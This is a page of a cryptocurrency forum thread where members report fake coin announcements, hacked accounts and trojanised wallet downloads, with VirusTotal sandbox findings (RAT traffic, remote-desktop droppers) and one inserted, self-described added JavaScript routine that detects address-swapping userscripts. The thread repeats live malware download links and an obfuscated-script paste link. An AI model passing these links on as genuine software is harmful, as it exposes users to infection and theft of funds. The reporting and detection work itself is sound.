
Topic: Report Malware and Suspicious Links here so Mods can take Action ! - page 4. (Read 37843 times)

member
Activity: 205
Merit: 43
✔️ Telegram @miningrelease
Account: aji471  <= Please ban
Fake Ann topic: [ANN] RadiumX New PoW coin . No ICO. No Masternode



Wallets
Code:
https://github.com/RadiumXMain/RadiumX/releases/download/v2.0.3/RadiumX_win64_v2.0.3.zip

Site
Code:
radiumxcoin.info (in maintenance)

legendary
Activity: 3178
Merit: 3295
We have a new Fake Ann Thread with a Fake Webpage and a Malware download there for [CCCN] Cococoin!

Fake Webpage :
Code:
https://cocomemefun.net/

On the Page there is a Link to a Github Account that is only 5 days old and has nothing in it.
Fake Github : github.com/coco-meme

On the Webpage there is a download for the Wallet.
Code:
https://download.cocomemefun.net/files/cococoin-qt-windows.zip

And here it's getting interesting: when you download the Wallet File, install it and run it, a lot of things will happen.
Malware detected : Win64:Evo-gen [Trj]

Code:
Drops script at startup location
Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Dot net compiler compiles file from suspicious location
Suspicious DNS Query for IP Lookup Service APIs
PowerShell Script Run in AppData
Startup Folder File Write
Unsigned DLL Loaded by Windows Utility
Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location

Code:
SSLBL: Traffic to malicious host (likely QuasarRAT C&C traffic)  <--- A Network Trojan was detected
ET MALWARE Observed Malicious SSL Cert (Quasar CnC)
ET MALWARE Generic AsyncRAT Style SSL Cert
SSLBL: Malicious SSL certificate detected (QuasarRAT C&C)
Source : https://www.virustotal.com/gui/file/bbf26e9b118b49791296baf3eca4442de993b2e5931acfa2eb7fe10c0b6d4811/behavior


Account : Anevigra  <--- Please ban or Lock that Account and delete the Thread
This user recently woke up from a long period of inactivity.
Registered since October 04, 2021 and not a single post, Hacked or sold Account

Fake Ann Thread :   [ANN] [CCCN] Cococoin – The Funniest Meme Coin of the Decade! 🐔🚀

Cococoin – The Funniest Meme Coin of the Decade
Code:
Download a CCCN Wallet: https://cocomemefun.net

There are more results and investigation about more and other Hacked Accounts I can't post for now, but I will write a PM to Cyrus.
member
Activity: 205
Merit: 43
✔️ Telegram @miningrelease
Account: chekamarue  <= Please ban
Fake Ann topic: [ANN] RadiumX New PoW coin . No ICO. No Masternode


Wallet Address Prefix: P

Wallets
Code:
https://github.com/RadiumXMain/RadiumX/releases/download/v2.0.3/RadiumX_win64_v2.0.3.zip

legendary
Activity: 3178
Merit: 3295
We have a new Fake Ann Thread with an already used Fake Github download Link with Malware for Mulierum again !

Fake Github : github.com/mulierum

The Fake Wallet download file is still the same size, 114 MB.

Account : MSAS  <--- Please ban or Lock that Account and delete the Thread
This user recently woke up from a long period of inactivity.
Registered since May 07, 2016 and last post was back on December 14, 2018, Hacked or sold Account

Fake Ann Thread :  [ANN] Mulierum | POW | GhostRider

Wallet:
Code:
https://github.com/mulierum/mulierum-core/releases/download/2.0.1/mulierum-win.x64-QT-v.2.0.1-1.zip
https://github.com/mulierum/mulierum-core/releases/download/2.0.1/mulierum-linux-QT-v.2.0.1-1.tar.gz

This post is also a reference for the Github Report !
sr. member
Activity: 602
Merit: 387
Rollbit is for you. Take $RLB token!
A download file in this post https://bitcointalksearch.org/topic/--5510016 can be malicious.

I checked with Virustotal with URL checking, it's clean. I don't want to download the file and check it with Virustotal, but a newbie sharing a download file is very suspicious.
Code:
Download https://mega.nz/file/HWh0zIoZ#kYdT27HIvOpMGlxX7V28es-5pVNJfSNkhVqBJuGZ0Lo
legendary
Activity: 2394
Merit: 1049
Smart is not enough, there must be skills
It's like the Mulierum virus is back, this time from a hacked account. Be vigilant and keep reporting the fake Github.

Account: theseratio This user recently woke up from a long period of inactivity. - Please Ban
Fake ANN: [ANN] Mulierum | POW | GhostRider

Code:
[b]Windows:[/b] https://github.com/mulierum/mulierum-core/releases/download/2.0.1/mulierum-win.x64-QT-v.2.0.1-1.zip
[b]Linux:[/b] https://github.com/mulierum/mulierum-core/releases/download/2.0.1/mulierum-linux-QT-v.2.0.1-1.tar.gz
legendary
Activity: 3178
Merit: 3295
We have again a Fake Ann Thread with the Fake Github Malware download Link for Mulierum!

Fake Github : github.com/mulierum
The Wallet File there was just uploaded 40 Min ago with a size of 116 MB
Source : https://www.virustotal.com/gui/file/b1acdc009df8f2af7e45b6216fd94179d05d1b335f4cdbc146a72e3e37d98a53/detection

If you install that Fake Wallet file and start it, a remote desktop access program will be installed
Code:
Processes created
"C:\Users\\AppData\Roaming\rustdesk.exe"
C:\Users\\AppData\Roaming\Zlvmon_v3\rustdesk.exe
Source : https://www.virustotal.com/gui/file/b1acdc009df8f2af7e45b6216fd94179d05d1b335f4cdbc146a72e3e37d98a53/behavior

Account : CCMS  <--- Please ban or Lock that Account and delete the Thread
Last post from that Account was August 14, 2024, so it's freshly hacked or sold.

Fake Ann Thread : [ANN] Mulierum | POW | GhostRider
As always the Thread is self-moderated by the hackers.

Wallet:
Code:
Windows: https://github.com/mulierum/mulierum-core/releases/download/2.0.1/mulierum-win.x64-QT-v.2.0.1-1.zip
Linux: https://github.com/mulierum/mulierum-core/releases/download/2.0.1/mulierum-linux-QT-v.2.0.1-1.tar.gz

And another User posted it also
Account : Cholidm  <--- Please ban or Lock that Account and delete the Thread

Wallet:
Code:
https://github.com/mulierum/mulierum-core/releases/download/2.0.1/mulierum-win.x64-QT-v.2.0.1-1.zip
https://github.com/mulierum/mulierum-core/releases/download/2.0.1/mulierum-linux-QT-v.2.0.1-1.tar.gz


This post is also a reference for the Github Report !
legendary
Activity: 2394
Merit: 1049
Smart is not enough, there must be skills
Full member users who just woke up/hacked back are spreading the virus with two threads at once, please be careful.

Account: BlueStone This user recently woke up from a long period of inactivity. - Please Ban
Fake ANN: [ANN] Mulierum | POW | GhostRider

Code:
[b]Windows: [/b] https://github.com/mulierum/mulierum-core/releases/download/2.0.1/mulierum-win.x64-QT-v.2.0.1-1.zip
[b]Linux: [/b] https://github.com/mulierum/mulierum-core/releases/download/2.0.1/mulierum-linux-QT-v.2.0.1-1.tar.gz

Fake ANN: [ANN][SSPOS] CodeBlock Blockchain: Welcome to a New Era

Code:
https://github.com/CodeBlockMainnet/CodeBlock/releases/download/1.3.1/CodeBlock-wallet_v1.3.1.zip
member
Activity: 205
Merit: 43
✔️ Telegram @miningrelease
Account: DareToken  <= Please ban
Fake Ann topic: [ANN] Mulierum | POW | GhostRider


Wallet:

Code:
[b]Windows: [/b] https://github.com/mulierum/mulierum-core/releases/download/2.0.1/mulierum-win.x64-QT-v.2.0.1-1.zip
[b]Linux: [/b] https://github.com/mulierum/mulierum-core/releases/download/2.0.1/mulierum-linux-QT-v.2.0.1-1.tar.gz

legendary
Activity: 2394
Merit: 1049
Smart is not enough, there must be skills
The hacked Hero Member account last posted in 2015 and is now actively spreading the virus via Github.

Account: Herbert This user recently woke up from a long period of inactivity. - Please Ban
Fake ANN: [ANN] Mulierum | POW | GhostRider

Code:
[b]Windows: [/b] https://github.com/mulierum/mulierum-core/releases/download/2.0.1/mulierum-win.x64-QT-v.2.0.1-1.zip
[b]Linux: [/b] https://github.com/mulierum/mulierum-core/releases/download/2.0.1/mulierum-linux-QT-v.2.0.1-1.tar.gz
legendary
Activity: 3178
Merit: 3295
Yep, it's again a Fake Ann with Malware download Link from their Webpage, this time for Aldibi

Fake download Wallet File on the Webpage:
Code:
download.aldibi.com/files/aldibi-qt-windows.zip

Also there is a Fake Github Link on their Page that is already deleted.
Fake Github : github.com/aldibi-coin/core

The sandbox CAPE Sandbox flags this file as: MALWARE RAT
The sandbox Zenbox flags this file as: MALWARE EVADER
Code:
Drops script at startup location
ET MALWARE Common RAT Connectivity Check Observed
ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
ET HUNTING SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016
Source : https://www.virustotal.com/gui/file/7fb14f997b1c92cc4d7a70db91657fc01f5feba66c9dd1e1b918567280218e37/behavior

Account : qiqikesfket  <--- Please ban or Lock that Account and delete the Thread
This user recently woke up from a long period of inactivity.
Registered since October 04, 2021, Hacked or sold Account

Fake Ann Thread:  [ANN] Aldibi: Empowering the Next Era of Global Transactions

Aldibi (ALDB)
Code:
https://aldibi.com/
member
Activity: 450
Merit: 10
Trojan in the Windows binary available for download from their website: https://aldibi.com/

https://bitcointalksearch.org/topic/--5506809
member
Activity: 205
Merit: 43
✔️ Telegram @miningrelease
Account: Tam.Shams  <= Please ban
Fake Ann topic: [ANN] Mulierum | POW | GhostRider


Wallet:

Code:
[b]Windows: [/b] https://github.com/mulierum/mulierum-core/releases/download/2.0.1/mulierum-win.x64-QT-v.2.0.1-1.zip
[b]Linux: [/b] https://github.com/mulierum/mulierum-core/releases/download/2.0.1/mulierum-linux-QT-v.2.0.1-1.tar.gz
member
Activity: 205
Merit: 43
✔️ Telegram @miningrelease
Account: pedpedped101  <= Please ban
Fake Ann topic: [ANN] Mulierum | POW | GhostRider

Wallet:

Code:
[b]Windows: [/b] https://github.com/mulierum/mulierum-core/releases/download/2.0.1/mulierum-win.x64-QT-v.2.0.1-1.zip
[b]Linux: [/b] https://github.com/mulierum/mulierum-core/releases/download/2.0.1/mulierum-linux-QT-v.2.0.1-1.tar.gz
legendary
Activity: 2394
Merit: 1049
Smart is not enough, there must be skills
Another hacked account spreading the virus via a Github link

Account: ikanunaki account hacked and please ban
Fake ANN: [ANN] Mulierum | POW | GhostRider

Code:
[b]Windows: [/b] https://github.com/mulierum/mulierum-core/releases/download/2.0.1/mulierum-win.x64-QT-v.2.0.1-1.zip
[b]Linux: [/b] https://github.com/mulierum/mulierum-core/releases/download/2.0.1/mulierum-linux-QT-v.2.0.1-1.tar.gz
legendary
Activity: 3178
Merit: 3295
And again we have a new Fake Ann Thread with a Fake Github Account and Malware download Link for Mulierum!

The Fake Github was just created 1 Hour ago.

Fake Github : github.com/mulierum

The Download Wallet File is 100 MB big and the same as we got already in the past.

Code:
"C:\Users\\AppData\Roaming\ObjectDock.exe"
C:\Users\\AppData\Roaming\tg_Sync\ObjectDock.exe
C:\Windows\system32\SecurityHealthService.exe
C:\Windows\system32\WerFault.exe -u -p 636 -s 504
Source : https://www.virustotal.com/gui/file/b6761479c00cffc7e99e820060518b12024e533fbc908da116ecce2a4cb2759d/behavior

Account : havi agasa  <--- Please ban or Lock that Account and delete the Thread
This user recently woke up from a long period of inactivity.
Registered since June 08, 2017, and the last post from that User was back on July 04, 2021, Hacked or sold Account

Fake Ann Thread :  [ANN] Mulierum | POW | GhostRider

Mulierum
Wallet:
Code:
https://github.com/mulierum/mulierum-core/releases/download/2.0.1/mulierum-win.x64-QT-v.2.0.1-1.zip
https://github.com/mulierum/mulierum-core/releases/download/2.0.1/mulierum-linux-QT-v.2.0.1-1.tar.gz

This post is also a reference for the Github Report !
copper member
Activity: 3948
Merit: 2201
Verified awesomeness ✔
If anyone has more experience with analyzing obfuscated javascript code and is willing to try, it would be interesting to find out what the script actually does.


I tried using some online tools: https://private.coinsofnakamoto.com/?b4527618e0f7c407#2jRhaSBjdSStxKnJApfAMhszgfJM3mLJv4giXjN94UGz (do not run this, obv).

They seem to pick a random BTC address from the list, replace the one on the page (including the QR code) and then do a call to pipedream with some basic description (which seems to return 204). Very basic stuff honestly.
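
The behaviour described in the reply above (a list of BTC addresses swapped into the page, plus a callback to pipedream) can be checked for statically once a userscript has been deobfuscated. This is an added example, not part of any forum post and not the reported script; the function name `triageUserscript`, the regexes, the two-finding threshold and both sample inputs are assumptions constructed for illustration.

```javascript
// Static triage of a deobfuscated userscript: looks for the three traits
// reported in the thread, without ever executing the script.
const BTC_ADDR = /\b(?:[13][a-km-zA-HJ-NP-Z1-9]{25,34}|bc1[ac-hj-np-z02-9]{11,71})\b/g;
const COLLECTOR_HOST = /https?:\/\/[a-z0-9.-]*\.pipedream\.net\b/gi; // assumed endpoint shape
const BROAD_MATCH = /^\/\/\s*@(?:match|include)\s+(\*:\/\/\*\/\*|\*|https?:\/\/\*\/\*)\s*$/m;
const DYNAMIC_CODE = /\beval\s*\(|\bFunction\s*\(|\batob\s*\(/;

function triageUserscript(source) {
  const addresses = [...new Set(source.match(BTC_ADDR) || [])];
  const collectors = [...new Set(source.match(COLLECTOR_HOST) || [])];
  const findings = [];
  // A payment-related helper has no reason to run on every site.
  if (BROAD_MATCH.test(source)) findings.push("runs-on-every-site");
  // More than one hard-coded address suggests a pool to pick from at random.
  if (addresses.length >= 2) findings.push("embedded-address-list");
  // Request-collector endpoints are a common way to log each successful swap.
  if (collectors.length > 0) findings.push("webhook-collector-call");
  if (DYNAMIC_CODE.test(source)) findings.push("dynamic-code");
  return { addresses, collectors, findings, suspicious: findings.length >= 2 };
}

// Constructed inputs: the addresses only have the right shape, they are not real.
const fakeAddr = (ch) => "1" + ch.repeat(30);
const SAMPLE_SUSPECT = [
  "// ==UserScript==",
  "// @name   Gift card helper",
  "// @match  *://*/*",
  "// ==/UserScript==",
  `const pool = ["${fakeAddr("A")}", "${fakeAddr("B")}", "${fakeAddr("C")}"];`,
  'fetch("https://constructed-endpoint.m.pipedream.net", { method: "POST" });',
].join("\n");
const SAMPLE_BENIGN = [
  "// ==UserScript==",
  "// @match  https://example.org/*",
  "// ==/UserScript==",
  'document.title = "hello";',
].join("\n");

console.log(triageUserscript(SAMPLE_SUSPECT));
console.log(triageUserscript(SAMPLE_BENIGN));
```

The check only works on readable source; a heavily obfuscated script like the one reported has to be unpacked first, and the absence of findings on packed code means nothing.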
legendary
Activity: 1820
Merit: 2700
Crypto Swap Exchange
A potential scam unfolding in the "Question about selling free giftcards" thread - [https://bitcointalk.org/index.php?topic=5505793.0]

Here's what we know:

A new member, Revaniz, claims to have found a method for free gift cards and offers to sell them.
Another new member, WARtoze99, suggested a platform for selling the gift cards only twenty seconds later, then asked for the method to obtain them.
Revaniz provides a Google Drive link claiming to be the exploit method.

Code:
https://drive.google.com/file/d/1Mzn6o3n5xIhN6nueBAl3YTzyb27ZgMrD/view?OAxXtfCKIY

The fake exploit method they promote involves installing a greasemonkey/tampermonkey script into the user's browser. The script is heavily obfuscated and undoubtedly contains a malicious payload designed to steal your crypto or worse.

Code:
Link #1 https://paste.sh/7vnaa5T9#rnL_3Gbklz9HKMIUKuPPG3yf
Link #2 (backup) https://files.catbox.moe/1evss2.txt

If anyone has more experience with analyzing obfuscated javascript code and is willing to try, it would be interesting to find out what the script actually does.
hero member
Activity: 1036
Merit: 933
Find your Digital Services at- cryptolibrary.pro
And we got the next Fake Ann Thread with an already used Fake Github Account with Malware, this time for Binarium!
<✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂✂>

Fake Ann Thread :  [ANN] Binarium | POW | GhostRider
owh gosh they are fake !!!

I just visited their thread and I was also looking at their official representative social handles for offering some business.

Anyway, bad luck for those scammers. Thanks again for the catch.